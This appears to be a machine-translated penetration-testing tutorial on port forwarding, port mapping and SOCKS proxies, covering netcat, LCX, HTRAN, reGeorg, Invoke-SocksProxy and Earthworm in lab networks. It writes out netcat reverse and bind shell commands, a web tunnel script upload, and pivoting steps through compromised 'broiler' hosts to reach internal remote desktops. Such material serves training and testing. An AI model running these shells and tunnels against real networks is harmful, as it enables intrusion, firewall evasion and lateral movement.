Port forwarding & port mapping
0x01 What is port forwarding
Port forwarding, sometimes called tunneling, is a method used by Secure Shell (SSH) for secure communication over a network. Port forwarding is the act of forwarding a network port from one network node to another, which enables an external user to reach a port on a private internal IP address (inside a local area network) from the outside through an activated NAT router.
Mandarin: Port forwarding is to forward a port, which can be the port of this machine or the port of any host that can be accessed by this machine, to any IP that can be accessed. Usually this IP is the public network ip
0x02 What is port mapping
Port mapping is a kind of NAT. Its function is to translate the address in the public network into a private address. The
ADSL broadband router with routing mode has a dynamic or fixed public network IP. ADSL is directly connected to the HUB or switch. All Computer sharing online.
Putonghua: It is port mapping, which is to map an internal network port to a certain port on the public network. Suppose my own computer is in the internal network and has no public network IP, but I want to provide a port
for other people to use. This is Port Mapping
0x03 distinguish between port mapping and port forwarding
Port mapping scenario:
Host A on the external network wants to access the service on host B on the internal network
Port forwarding scenario:
Host A on the external network can access any port on host B on the internal network, but cannot access the port on host C on the internal network
At this time, you can connect the port of host C to the port of host B, then the external network host A accessing the port of host B is equivalent to accessing the port of host C
Summarize:
The principles of port forwarding and port mapping are the same, but the application scenarios are different. If we forward the port of the local machine to the port of the remote host, we can call it port mapping or port forwarding. See the picture below [note the text on the picture 】
If we forward the port of any IP that can be accessed by this machine
to the port of another server, we call it port forwarding, see the picture below [note the text on the picture]
0x04 Distinguish forward connection and reverse connection
- Forward connection: your machine connects to the target machine
- Reverse connection: the target machine connects back to your machine
- Regardless of mapping or forwarding, there are pros and cons, the principle is the same
0x05 port forwarding and proxy tools
- Lcx
- Htran
- Netcat
0x06 Environment topology map
A host W7
B Host W7
C Host XP
0x07 NC
NC usage
2. NC reverse connection-network environment assumption:
A cannot access intranet B from the external network [A means the attacker is on the external network]
B's internal network can access external network A
A:192.168.0.226
B:192.168.32.130
Suitable for nc reverse connection : it also bounces the shell of the internal network host B to the external network A
Execute on external host A: nc –nvlp 7777
Execute on intranet host B: nc –e cmd 192.168.0.226 7777
Here I pretend that I am connected to the shell and uploaded nc
Echo at host A
3. NC forward connection - network environment assumption:
A's internal network can access external network B [A means the attacker is on the internal network]
B's external network cannot access intranet A
Suitable for nc forward connection : it also bounces the shell of the internal network host A to the external network B
Execute nc –l –p 5555 –e cmd .exe on intranet A
Execute nc –nvv 192.168.0.226 5555 on host B on the external network
4. Explain:
If the client [equivalent to the internal network] connects to the server [equivalent to the external network] and wants to obtain the shell of the server, it is called a forward shell. If the client connects to the server and the server wants to obtain the shell of the client, it is called a reverse shell. to the shell
NC is a Swiss Army Knife of security, it is so famous, it can not only rebound shell, port forwarding, but also chat, etc.
0x08 LCX
LCX usage:
LCX port mapping environment assumptions:
A cannot access intranet B from the external network [A means the attacker is on the external network]
B's internal network can access external network A
Execute on intranet host B: lcx.exe –slave 192.168.0.226 7777 192.168.32.132 3389
Means: Forward port 3389 of the internal network (192.168.32.132) to port 7777 of the public network (192.168.0.226
)
Execute on external host A: lcx.exe –listen 7777 5555
Means: listen to port 7777 on the host and transfer to 5555
At this point, connecting to the remote desktop on host A to access 127.0.0.1:5555 is equivalent to accessing B's 3389
LCX port forwarding environment assumptions:
A can access B from the external network
B intranet can access C
A cannot access C
A host ip: 192.168.0.226
B host ip: 192.168.32.130
C host ip: 192.168.32.135
Execute on intranet host B: lcx.exe –tran 7777 192.168.32.135 3389
Means: transfer port 3389 of host C to port 7777 of host B
At this time, accessing port 7777 on host B is equivalent to accessing port 3389 on host C
Run mstsc on host A to connect to 192.168.32.130:7777 or 127.0.0.1:7777 on host B to access 3389 of C
explain
LCX is mostly used when the empty computer (broiler) is in the intranet, and hackers want to use remote terminals for management. Generally, hackers will open the bot 3389, and then perform port forwarding through LCX
0x09 HTRAN
HTRAN Usage
How to use HTRAN-environmental assumption 1
B public network
A can directly access B [and B has enabled 3389, and B's firewall prohibits 3389 connections]
B can also access A
A host ip: 192.168.0.226
B host ip: 192.168.32.130
C host ip: 192.168.32.135
method 1:
Execute on host B: Htran2.4.exe -p -tran 7777 127.0.0.1 3389
Means: turn B's 3389 port to this machine's 7777 port
At this time, host A performs remote desktop terminal connection: 192.168.32.130:7777
Method 2:
Monitor and execute on host A: HTran2.4.exe -p -listen 8888 9999
Means: listen to port 8888 of this machine, and transfer port 8888 traffic to 9999
Execute on host B: HTran2.4.exe -p -slave 192.168.0.226 8888 127.0.0.1 3389
Means: forward port 3389 of this machine to port 8888 of A
Next, connect the remote desktop on the A host to access the local port 9999, and you can connect to B's 3389
How to use HTRAN-environmental assumption 2
Host B is on the public network
C is on B's intranet
A can access B, but not C
A host ip: 192.168.0.226
B host ip: 192.168.32.130
C host ip: 192.168.32.135
method 1:
Execute on host B: HTran2.4.exe -p -tran 8888 192.168.32.135 3389
Means: Forward port 3389 of host C to 8888 of host B
At this time, A's connection to B's 8888 is equivalent to accessing C's 3389
Method 2:
Monitor on host B HTran2.4.exe -p -listen 7777 9999
Means: listen to port 7777 of host B and forward traffic to 9999
Execute on the C host: HTran2.4.exe -p -slave 192.168.32.130 7777 127.0.0.1 3389
Means: transfer port 3389 of C to port 7777 of port B
acting
0x01 What is a proxy
Proxy (English: Proxy), also known as network proxy, is a special network service that allows a network terminal (usually a client) to make an indirect connection with another network terminal (usually a server) through this service. Some network devices such as gateways and routers have network proxy functions. It is generally believed that proxy services are conducive to ensuring the privacy or security of network terminals and preventing attacks.
0x02 proxy category
HTTP proxy
SOCKS proxy
FTP proxy
Telnet proxy
SSL proxy
0x03 distinguish between forward proxy and reverse proxy
In the forward proxy, the proxy and the client belong to the same LAN and are transparent to the server; in the reverse proxy, the proxy and the
server belong to the same LAN and are transparent to the client. One proxy is the client and the other is the server
Note: I drew it myself, I don't accept criticism ☺
0x04 reGeorg+Proxychains proxy
reGeorg is the successor of reDuh. Mainly forward the port of the intranet server to the local machine through the http/https tunnel
Select the corresponding server script to upload to the server of host B, which is php in mine
The access file shows that Georg says, 'All seems fine', the proxy is successful
Then execute the reGeorgSocksProxy.py file [requires urllib3 module]: python2
reGeorgSocksProxy.py –u “ http://192.168.32.130/tunnel.php” –p 8888
Also display All seems fine on the command line interface
Next use the tool Proxifier
First add a server
Configure proxy rules
Here choose to select the remote desktop program mstsc
Connect to remote desktop
You can see the traffic going through the proxy
0x05 Socks4/5 proxy based on powershell
Invoke-SocksProxy is used, address: GitHub - p3nt4/Invoke-SocksProxy: Socks proxy, and reverse socks server using powershell.
Invoke-SocksProxy Usage
Invoke-SocksProxy using method one
Win10 host ip: 192.168.192.130
Win7 host ip: 192.168.192.129
Create a sock4/5 proxy
On Win10, first run powershell with administrator privileges. If the script is prompted to prohibit execution, please enter "set-ExecutionPolicy
RemoteSigned"
Enter Import-Module .\Invoke-SocksProxy.psm1 to import the module
Enter Invoke-SocksProxy -bindPort 1234 to create a socks proxy on port 1234
Next, use the socks proxy software on Win7 to access the external network through port 1234 of Win10
The software I used this time is sockscap, of course Proxychains will definitely work
Click the file and select "Settings" to set the socks server IP and port, click Apply, OK
Click New, select the program that needs to pass through the proxy, the Firefox browser I choose here
Click to run, we visit Baidu
On the W10 host, the window can be seen that the connection has been successful
Invoke-SocksProxy use method two
Add thread mode, enter Invoke-SocksProxy -bindPort 1234 -threads 400
If you don't add -bindPort, the default port is 1080
0x06 Earthworm
EW is a set of portable network penetration tools, with
two core functions of SOCKS v5 service erection and port forwarding, which can complete network penetration in complex network environments
Note: This tool has stopped updating and downloading
Earthworm Usage
The following figure is a schematic diagram:
This tool can open up a network tunnel by means of "forward", "reverse", and "multi-level cascading" to reach the depths of the network, break through network restrictions with the unique means of earthworms, and loosen soil for firewalls.
A variety of executable files are provided in the toolkit to suit different operating systems,
including Linux, Windows, MacOS, and Arm-Linux. Support for more platforms is still under maintenance, so stay tuned.
Instructions:
In all the following examples, unless otherwise specified, the proxy port is 1080, and the service is SOCKSv5 proxy service.
The tool has 6
command formats (ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen, lcx_tran).
- Forward SOCKS v5 server
\$ ./ew -s ssocksd -l 1080
- Bounce SOCKS v5 server
This operation is divided into two steps:
a) First run the following command on a host A with a public network ip:
\$ ./ew -s rcsocks -l 1080 -e 8888
b) Start the SOCKS v5 service on the target host B and bounce to port 8888 of the public network host
\$ ./ew -s rssocks -d 1.1.1.1 -e 8888
success.
- multi-level cascade
The tool comes with three port forwarding instructions, and their parameter formats are:
\$ ./ew -s lcx_listen -l 1080 -e 8888
\$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
\$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
Through these port forwarding instructions, TCP-based services in the deep layer of the network can be forwarded to the root, such as SOCKS v5.
First provide two "secondary cascading" local SOCKS test samples:
a) Usage of lcx_tran
\$ ./ew -s ssocksd -l 9999
\$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
b) Usage of lcx_listen and lcx_slave
\$ ./ew -s lcx_listen -l 1080 -e 8888
\$ ./ew -s ssocksd -l 9999
\$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
Provide a "three-level cascading" local SOCKS test case for reference
\$ ./ew -s rcsocks -l 1080 -e 8888
\$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
\$ ./ew -s lcx_listen -l 9999 -e 7777
\$ ./ew -s rssocks -d 127.0.0.1 -e 7777
Data flow direction: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks
Note: The source of the above content refers to the official website or the Readme in the tool
Earthworm usage method one [forward proxy]
Win7 host ip: 192.168.192.1
Win7 host ip: 192.168.192.9
There is a public network IP on the border of the target network and the listening port can be opened arbitrarily:
+---------+ +-------------------+
|HackTools| ->> | 7777-> 192.168.192.9 |
+---------+ +-------------------+
Execution: ew_for_win_32.exe -s ssocksd -l 7777
It means: on the host w7 192.168.192.9, use this command to open the socks proxy on port 7777
Next, you can use
tools such as sockscap or Proxychains to access the proxy port, because I have mentioned the usage before, I will not ink it, just put the demo screenshot directly
Note: This is a forward proxy, the proxy is a hacker client, and the connection is a broiler equivalent server
Earthworm usage method two [reverse proxy]
Win7 x32 host ip: 192.168.0.75 [hack machine]
Win7 host ip: 192.168.0.226 [public network machine]
Win7 host ip: 192.168.192.9 【Intranet machine】
There is no public IP at the target network boundary, so a socks proxy needs to be created by rebounding
192.168.192.9 A controllable public network IP host Controllable internal network host
+---------+ +--------------------------+ | +---------------+
|HackTools| ->> | 1089 ->192.168.0.226 -> 9999 | Firewall| \<--
192.168.0.75|
+---------+ +--------------------------+ | +---------------+
Execute on the public network machine [vps]: ew_for_win_32.exe -s rcsocks -l 1089 -e 9999
It means: Add a transfer tunnel to the public network host of 192.168.0.226, and
forward the proxy request received by 1089 to the host connected to port 9999
Execute on the intranet host [controllable broiler]: ew_for_win_32.exe -s rssocks -d 192.168.0.226 -e
9999
It means: reversely connect the controllable intranet host of the target network to the public network host
Next, you can use the socks5 proxy service provided by the rssocks host by accessing tools such as sockscap or Proxychains at port 192.168.0.226:1089
Earthworm usage method three
Win7 host ip: 192.168.192.1 [hack machine]
Win7 host ip: 192.168.192.9 【A】
Win7 host ip: 192.168.192.11 【B】
Obtain the authority of two hosts A and B in the target network, the situation is described as follows:
A host: There is a public network IP, and it is free to listen to any port, and cannot access specific resources
Host B: The internal host of the target network, which can access specific resources, but cannot access the public network
Host A can be directly connected to host B
Controllable boundary host A can access the specified resource host B
+---------+ +-----------------------+ +----------------
|HackTools| ->> | 1099 -->192.168.192.9 --> | ->> |7777 ->
192.168.192.11 |
+---------+ +-----------------------+ +-----------------+
Execute on host B: ew_for_win_32.exe -s ssocksd -l 7777
It means: use ssocksd to start the socks proxy on port 7777 on host B
Execute on host A: ew_for_win_32.exe -s lcx_tran -l 1099 -f 192.168.192.11 -g 7777
/ means to forward the socks proxy request received on port 1080 to port 7777 of host B.
Next, you can use the socks5 proxy service provided by the rssocks host by accessing sockscap or Proxychains and other tools at port 192.168.192.9:1099
Proxy success screenshot:
Earthworm usage method 4
Win7 host ip: 192.168.192.1 [hack machine]
Win7 host ip: 192.168.192.9 【A】
Win7 host ip: 192.168.192.10 [public network machine]
Win7 host ip: 192.168.192.13 【B】
Obtain the authority of two hosts A and B in the target network, the situation is described as follows:
A host: The border host of the target network, which has no public IP and cannot access specific resources.
Host B: The internal host of the target network, which can access specific resources, but cannot connect back to the public network.
Host A can be directly connected to host B
- Execute on the public network machine: ew_for_win_32.exe -s lcx_listen -l 1099 -e 8888
It means: Add a transfer tunnel to the 192.168.192.10 public network IP host, and forward
the proxy request received by 1080 to the host connected to port 8888
- Execute on host B: ew_for_win_32.exe -s ssocksd -l 9999
Means: Start the socks
proxy on port 9999 by using ssocksd on the 192.168.192.13 [B] host
- Execute on host A: ew_for_win_32.exe -s lcx_slave -d 192.168.192.10 -e 8888 -f
192.168.192.13 -g 9999
It means: on 192.168.192.9, through the lcx_slave method of the tool, open the
communication tunnel between 192.168.192.10:8888 and 192.168.192.13:9999
HackTools can use the socks5 proxy provided by the 192.168.192.13 host by accessing 192.168.192.10:1099
Successful screenshot:
B's
public network machine
A's
Hack machine
Note: Red is normal, my proxy machine B cannot access the external network
EarthwormSummary
Currently the tool provides six link states, which can be selected through the -s parameter, which are:
ssocksd rcsocks rssocks
lcx_slave lcx_tran lcx_listen
Among them, the core logic support of SOCKS5 service
is provided by ssocksd and rssocks, corresponding to the forward and reverse socks proxy respectively.
The rest of the lcx link status is used to open the path between the test host and the socks server.
lcx class pipeline
lcx_slave One side of the pipeline is connected to the proxy requester through bounce mode, and the other side is connected to the proxy provider host.
lcx_tran This pipeline receives proxy requests by listening to the local port, and transfers them to the proxy host.
The pipeline lcx_listen
receives data by listening to the local port, and transfers it to the host provided by the agent connected back to the target network.
By combining the characteristics of the lcx category pipeline, penetration testing in a multi-layer intranet environment can be realized.
Note: This is a summary written by me before. I edited the content and shared the pictures. Many tools such as frp and ngrok have not been summarized in it. If you have any questions, I hope you will give me your advice and don’t spray me.